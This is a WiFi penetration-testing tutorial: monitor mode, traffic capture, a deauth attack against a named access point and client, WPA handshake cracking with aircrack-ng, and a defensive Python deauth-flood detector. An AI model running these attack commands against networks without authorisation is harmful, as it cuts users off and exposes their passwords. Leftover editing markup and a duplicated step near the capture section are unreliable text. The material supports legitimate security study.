Pentesting wifi networks

Put your wifi interface in monitor mode to capture not only the WiFi traffic routed to the device, but all the traffic that is transmitted over the air.

Enable monitor mode

  1. Check if you have processes that will interfere with monitor mode:
└─$ sudo airmon-ng check                                                    
[sudo] password for gal:

Found 4 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

PID Name
817 avahi-daemon
839 avahi-daemon
891 NetworkManager
963 wpa_supplicant
  2. Kill them:
┌──(gal㉿gal)-[~/workspace/gal/docs]
└─$ sudo airmon-ng check kill

Killing these processes:

PID Name
963 wpa_supplicant
  3. Start monitor mode:
└─$ sudo airmon-ng start wlan0


PHY Interface Driver Chipset

phy0 wlan0 iwlwifi Intel Corporation Alder Lake-P PCH CNVi WiFi (rev 01)
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)

The interface is usually renamed from wlan0 to wlan0mon at this point; use the new name in the following commands.

Capture the traffic

  1. Start checking what's around:
</gml_replace>
<gr_replace lines="47" cat="reformat" orig="1. Once">
  2. Once you have found a target, specify the channel and the BSSID:
sudo airodump-ng wlan0mon
  1. Once you have found a target, specify the channel and the bssid:
sudo airodump-ng --bssid 66:8B:92:F9:A2:9A  -w /tmp/guifiwc wlan0mon -c 11

This stores the captured traffic in files with the prefix given to -w (here /tmp/guifiwc), locked to the channel given with -c. Once you see a station connected to the BSSID, you can start a deauth attack.

Deauth attack

The deauth attack sends packets to the WiFi client to force a de-authentication and a subsequent re-authentication with the network. This produces a handshake whose messages are keyed with a value derived from the WiFi password, which we'll later try to bruteforce with a dictionary attack.

sudo aireplay-ng -0 2 -c FA:50:A4:49:2F:AA -a 66:8B:92:F9:A2:9A wlan0mon

-0 means deauth and 2 is the number of deauth packets to send; -c is the client MAC address; -a is the access point's BSSID.

Once this succeeds, the running airodump-ng will show the captured handshake data for that BSSID.
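From the defender's side, the attack above works because deauthentication and disassociation frames are unauthenticated management frames unless the network enforces 802.11w protected management frames (PMF); a wireless sensor can still spot the attack by counting such frames per BSSID over a short window. The following is an added example, not code from this page or the aircrack-ng project: it parses the fixed 802.11 management header from raw frame bytes and flags a BSSID that sees a burst of deauth/disassoc frames. The BSSID and client MAC are reused from the capture above; the "other" BSSID, the timestamps and the frames themselves are constructed test vectors built in the script.

```python
import struct
from collections import defaultdict

# 802.11 frame control, byte 0: bits 0-1 protocol version, 2-3 type, 4-7 subtype.
TYPE_MGMT = 0
SUBTYPE_BEACON = 0x08
SUBTYPE_DISASSOC = 0x0A
SUBTYPE_DEAUTH = 0x0C


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def parse_mgmt_frame(frame: bytes):
    """Parse the 24-byte fixed header of an 802.11 management frame (no radiotap, no FCS).

    Returns a dict with subtype, receiver (addr1), transmitter (addr2), bssid (addr3)
    and, for deauth/disassoc frames, the 16-bit little-endian reason code.
    Returns None for non-management or truncated frames.
    """
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    version = fc0 & 0x03
    ftype = (fc0 >> 2) & 0x03
    subtype = (fc0 >> 4) & 0x0F
    if version != 0 or ftype != TYPE_MGMT:
        return None
    parsed = {
        "subtype": subtype,
        "receiver": mac_str(frame[4:10]),
        "transmitter": mac_str(frame[10:16]),
        "bssid": mac_str(frame[16:22]),
        "reason": None,
    }
    if subtype in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
        if len(frame) < 26:
            return None  # body (reason code) missing: treat as truncated
        parsed["reason"] = struct.unpack_from("<H", frame, 24)[0]
    return parsed


def detect_deauth_floods(frames, window_s=10.0, threshold=5):
    """frames: iterable of (timestamp_seconds, raw_frame_bytes).

    Returns one alert (bssid, first_ts, last_ts, count) per BSSID for which at
    least `threshold` deauth/disassoc frames fall inside any `window_s` window.
    A single deauth is normal (a station leaving); a burst is not.
    """
    per_bssid = defaultdict(list)
    for ts, raw in frames:
        parsed = parse_mgmt_frame(raw)
        if parsed is None or parsed["reason"] is None:
            continue  # not a deauth/disassoc frame
        per_bssid[parsed["bssid"]].append(ts)

    alerts = []
    for bssid, stamps in per_bssid.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):  # sliding window over sorted timestamps
            while stamps[end] - stamps[start] > window_s:
                start += 1
            if end - start + 1 >= threshold:
                alerts.append((bssid, stamps[start], stamps[end], end - start + 1))
                break  # one alert per BSSID is enough
    return alerts


def make_mgmt_frame(subtype, receiver, transmitter, bssid, reason=None):
    """Constructed test vector only: a management frame with a zeroed duration/sequence field."""
    fc0 = (subtype << 4) | (TYPE_MGMT << 2)
    hdr = bytes([fc0, 0x00]) + b"\x00\x00"  # frame control + duration
    hdr += mac_bytes(receiver) + mac_bytes(transmitter) + mac_bytes(bssid)
    hdr += b"\x00\x00"  # sequence control
    body = struct.pack("<H", reason) if reason is not None else b""
    return hdr + body


AP = "66:8b:92:f9:a2:9a"        # BSSID from the capture above
CLIENT = "fa:50:a4:49:2f:aa"    # client MAC from the capture above
OTHER_AP = "02:00:00:00:00:01"  # constructed, unrelated network

# Constructed sample: a burst of 8 deauths against CLIENT on AP, plus benign noise.
SAMPLE_FRAMES = [
    (i / 10, make_mgmt_frame(SUBTYPE_DEAUTH, CLIENT, AP, AP, reason=7)) for i in range(8)
] + [
    (0.3, make_mgmt_frame(SUBTYPE_BEACON, "ff:ff:ff:ff:ff:ff", AP, AP)),          # beacon, ignored
    (2.0, make_mgmt_frame(SUBTYPE_DEAUTH, CLIENT, OTHER_AP, OTHER_AP, reason=3)),  # one benign deauth
    (2.5, bytes([0x08, 0x00]) + bytes(22)),                                         # data frame, ignored
    (3.0, b"\xc0\x00\x00\x00"),                                                     # truncated, ignored
]

if __name__ == "__main__":
    for bssid, first, last, count in detect_deauth_floods(SAMPLE_FRAMES):
        print(f"deauth flood on {bssid}: {count} frames between t={first}s and t={last}s")
```

The detector keys on addr3 (the BSSID) so that frames spoofed in either direction, from the AP to the client or vice versa, land in the same counter. On a real sensor you would feed it frames stripped of their radiotap header; the threshold and window should be tuned against the baseline of the network being monitored.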

Crack the password

Now pass the capture to aircrack-ng to bruteforce the password with a dictionary (-a2 selects WPA-PSK mode, -b the target BSSID, -w the wordlist):

aircrack-ng -a2 -b 66:8B:92:F9:A2:9A -w /usr/share/wordlists/rockyou.txt /tmp/guifiwc-02.cap

Revert to normal mode

Stop airmon-ng:

└─$ sudo airmon-ng stop wlan0mon

PHY Interface Driver Chipset

phy0 wlan0mon iwlwifi Intel Corporation Alder Lake-P PCH CNVi WiFi (rev 01)
(mac80211 station mode vif enabled on [phy0]wlan0)
(mac80211 monitor mode vif disabled for [phy0]wlan0mon)

You might need to start NetworkManager (or whichever services airmon-ng killed earlier) again:

sudo NetworkManager

More: https://github.com/ricardojoserf/wifi-pentesting-guide?tab=readme-ov-file#4